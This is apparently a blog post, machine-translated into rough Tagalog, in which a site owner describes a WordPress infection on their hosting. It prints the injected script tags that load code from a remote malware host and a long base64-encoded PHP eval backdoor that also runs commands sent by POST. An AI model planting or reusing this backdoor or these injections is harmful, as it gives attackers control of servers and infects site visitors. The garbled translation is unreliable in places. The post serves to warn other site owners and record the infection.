Kahit na chrome ay ang browser na ginagamit mo sa araw-araw, nanalo ng isa pang punto sa aking account. Ito ay ang browser na nagsisimula up ng mas mabilis sa aking pc, kapag may kailangan kong pumunta sa net at hindi maaaring maghintay para buksan ang isa pang browser bukas ko bang gamitin ito. Today kapag binuksan mo ang isang natanggap na mensahe na sa imahe sa:
Web site antoniocampos.net naglalaman ng mga elemento ng site atelier43.pl, kung saan lilitaw na mag-host sa malware - ie, software na maaaring makapinsala sa iyong computer o kung hindi gumana wala ang iyong pahintulot. Lamang ng pagbisita sa isang site na naglalaman ng malware ay maaaring makahawa sa iyong computer.
Para sa mas detalyadong impormasyon tungkol sa mga problema sa mga sangkap na ito, bisitahin ang Home Safe Browsing Diagnostic Google upang atelier43.pl.
matapos ang pagtingin sa source code ng nakita ko na sa anuman ay iturok code na ito sa orihinal na, Ang mga malisyosong code ay nakapasok:
<script src = http:/ / atelier43.pl/images/gifimg.php ></ script>
Kaagad matapos ang pagsasara ng tag </ head>, bumisita sa iba pang mga lugar sa lahat ng housed sama-sama at sa lahat ng lugar ay sa parehong palatandaan, matapos ang isang pagtatasa ng mag-ingat ko napansin na ang ilang mga file ay impeksyon sa pamamagitan ng iniksyon, Outreach na ang file ay nagkaroon ng ibang code.
Sa javascript file (. js):
document.write(‘<script src = http:/ / atelier43.pl/images/gifimg.php >< / script>');
Html file na magpapakita sa code na inilarawan sa itaas at sa mga file. Php ang sumusunod na code:
<?php eval(base64_decode(‘aWYoIWZ1bmN0aW9uX2V4aXN0cygncHEzazcnKSl7ZnVuY3Rpb24gcHEzazcoJHMpe2lmKH
ByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ I2lzJywkcywkYSkpZm9yZWF
jaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk NSl7JGU9cHJlZ19tYXRj
aCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF
0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFx
iIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2
RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRja
F9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14 XSo/KT4jaXM
nLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aF
xzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc
3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycp
LicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlK
CdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkYwWld4cFpYSTBNeTV3YkM5cGJXRm5aW
E12WjJsbWFXMW5MbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCR
zLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHM
sMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24
gcHEzazcyKCRhLCRiLCRjLCRkKXtnbG9iYWwkcHEzazcxOyRzPWFycmF5KCk7aWYoZnVuY3R
pb25fZXhpc3RzKCRwcTNrNzEpKWNhbGxfdXNlcl9mdW5jKCRwcTNrNzEsJGEsJGIsJGMsJGQ
pO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3B
xM2s3JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1h
cnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bn
QoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9
jbGVhbigpO31vYl9zdGFydCgncHEzazcnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2J
fc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kcHEzazdsPSgoJGE9QHNldF9lcnJ
vcl9oYW5kbGVyKCdwcTNrNzInKSkhPSdwcTNrNzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY2
9kZSgkX1BPU1RbJ2UnXSkpOw == ')); ?>
Ito ay ang code na responsable para sa infecting ang mga file na kapag gumawa sila ng isang base64_decode at pag-aralan ang mga code na lalabas sa paraan ng mga file ay impeksyon, ngunit hindi ipaliwanag kung paano ang code "ipinasok" sa unang pagkakataon.
Bilang karagdagan sa mga impeksiyon ay craidos ng maramihang mga file, may ilang mga pangalan na ay naghihintay ng post php code at tumakbo sa server, Aalis ang lahat ng mga file na ang gumagamit ay tumatakbo sa mga site na masusugatan.
Pagkatapos ng ilang mga paghahanap sa Google lahat ng mga puntos sa isang lamat sa Wordpress ngunit hindi natagpuan na bersyon, Sa tingin ko dapat ay sa 2.8.6 para sa hosting ng account ko 3 wordpress instalações ang lahat ng na-update sa isang 2.8.6. Ayon sa karunungan ng Google ay hindi ang mga unang na impeksyon sa pamamagitan ng salot na ito, kahit na ang mga artikulo ko nakita sa google ay hindi ang parehong, impeksiyon at ang pagkakaroon ng mga malisyosong code ay katulad sa kung ano ang nangyari sa akin.
Kaya ko bang sabihan ang lahat ng mga taong may mga site sa Wordpress upang tingnan kung ang mga ito ay impeksyon.
Ako nagda-download ang lahat ng mga file na nai-host sa server na ito para sa isang mas masusing pagtingin sa kung ano ang nangyari, Sa tingin ko ay hindi ako ay dumating sa anumang konklusyon bilang ako ay impeksyon dahil wala akong access sa logs ng Apache, Ngunit kahit ang kukunin ko na malinis ang lahat ng mga file.
Isang solusyon ay burahin ang lahat ng mga file sa pag-install at i-paste sa isang bagong bersyon ng lahat ng mga file, ngunit ito ay magiging sanhi ng lahat ng pagdaragdag ng mga tema at mga custom plugins ay nawala, at lakas ang pag-install ng lahat ng mga plugins muli.
Malas DESOLVE sa solusyon (hindi bababa sa paglilinis ng mga file) lumikha ng isang bagong post na may parehong.
Recent Comments